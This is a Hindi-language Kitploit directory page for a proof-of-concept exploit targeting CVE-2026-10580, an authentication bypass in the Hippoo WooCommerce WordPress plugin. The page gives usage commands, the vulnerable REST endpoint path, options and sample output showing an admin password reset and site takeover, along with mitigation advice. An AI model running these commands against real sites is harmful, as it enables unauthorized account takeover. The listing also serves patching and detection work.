Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10580 — CVE-2026-10580 के लिए PoC एक्सप्लॉइट - WooCommerce <= 1.9.4 के लिए Hippoo मोबाइल ऐप में प्रमाणीकरण बाईपास जिससे एडमिन खाता अधिग्रहण होता है | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
प्रमाणीकरण और प्राधिकरणपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

CVE-2026-10580 के लिए PoC एक्सप्लॉइट - WooCommerce <= 1.9.4 के लिए Hippoo मोबाइल ऐप में प्रमाणीकरण बाईपास जिससे एडमिन खाता अधिग्रहण होता है

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - प्रमाणीकरण बायपास से एडमिन खाता अधिग्रहण

License: MIT

अवलोकन

यह उपकरण CVE-2026-10580 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो Hippoo Mobile App for WooCommerce वर्डप्रेस प्लगइन (संस्करण <= 1.9.4) को प्रभावित करने वाली एक प्रमाणीकरण बायपास कमजोरी है। इस कमजोरी के कारण अप्रमाणित हमलावर किसी भी उपयोगकर्ता (एडमिन सहित) का पासवर्ड रीसेट कर सकते हैं, जिससे साइट का पूर्ण अधिग्रहण हो सकता है।

⚠️ महत्वपूर्ण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।

विशेषताएँ

  • कमजोर REST API एंडपॉइंट के माध्यम से सभी वर्डप्रेस उपयोगकर्ताओं की गणना करता है
  • एक निर्दिष्ट उपयोगकर्ता आईडी (डिफ़ॉल्ट: एडमिन आईडी 1) का पासवर्ड रीसेट करता है
  • रंगीन आउटपुट के साथ सरल कमांड-लाइन इंटरफ़ेस
  • परीक्षण वातावरण के लिए SSL सत्यापन अक्षम करने का विकल्प

उपयोग

आवश्यक शर्तें

  • Python 3.6+
  • requests लाइब्रेरी

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests

बुनियादी कमांड

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

विकल्प

उदाहरण

डिफ़ॉल्ट एडमिन आईडी (1) और SSL सत्यापन के साथ शोषण:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

एक विशिष्ट उपयोगकर्ता आईडी को लक्षित करें और SSL सत्यापन अक्षम करें:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

बैनर के बिना चलाएँ:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

नमूना आउटपुट

root@kitploit:~
[+] 3 उपयोगकर्ता मिले
    - उपयोगकर्ता आईडी: 1 | उपयोगकर्ता नाम: admin | भूमिका: प्रशासक
    - उपयोगकर्ता आईडी: 2 | उपयोगकर्ता नाम: editor_user | भूमिका: संपादक
    - उपयोगकर्ता आईडी: 3 | उपयोगकर्ता नाम: subscriber1 | भूमिका: ग्राहक

╔══════════════════════════════════════════════════════════════╗
║             एडमिन अधिग्रहण सफल                               ║
╚══════════════════════════════════════════════════════════════╝
    लक्ष्य: https://example.com
    लॉगिन: https://example.com/wp-admin
    उपयोगकर्ता नाम: admin
    पासवर्ड: PwnedCVE2026!!

शमन

यदि आप Hippoo प्लगइन का उपयोग कर रहे हैं, तो इसे तुरंत एक पैच किए गए संस्करण (>1.9.4) में अपडेट करें। इसके अतिरिक्त:

  • अनधिकृत परिवर्तनों के लिए नियमित रूप से उपयोगकर्ता खातों का ऑडिट करें
  • /wp-json/wc-hippoo/v1/ext/wp/v2/users पर अप्रत्याशित API अनुरोधों के लिए लॉग की निगरानी करें
  • यदि आवश्यक नहीं है तो वर्डप्रेस REST API तक पहुँच प्रतिबंधित करने पर विचार करें

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।

लेखक

0xgh057r3c0n

अस्वीकरण

लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनके आप स्वामी हैं या परीक्षण की स्पष्ट अनुमति है।

टूल डाउनलोड करें
तर्कविवरण
-t, --targetलक्ष्य वर्डप्रेस साइट URL (जैसे, https://example.com)
-p, --passwordएडमिन खाते के लिए सेट करने के लिए नया पासवर्ड
-i, --idअधिग्रहण के लिए उपयोगकर्ता आईडी (डिफ़ॉल्ट: 1)
-k, --insecureSSL प्रमाणपत्र सत्यापन छोड़ें
--no-bannerASCII बैनर को दबाएँ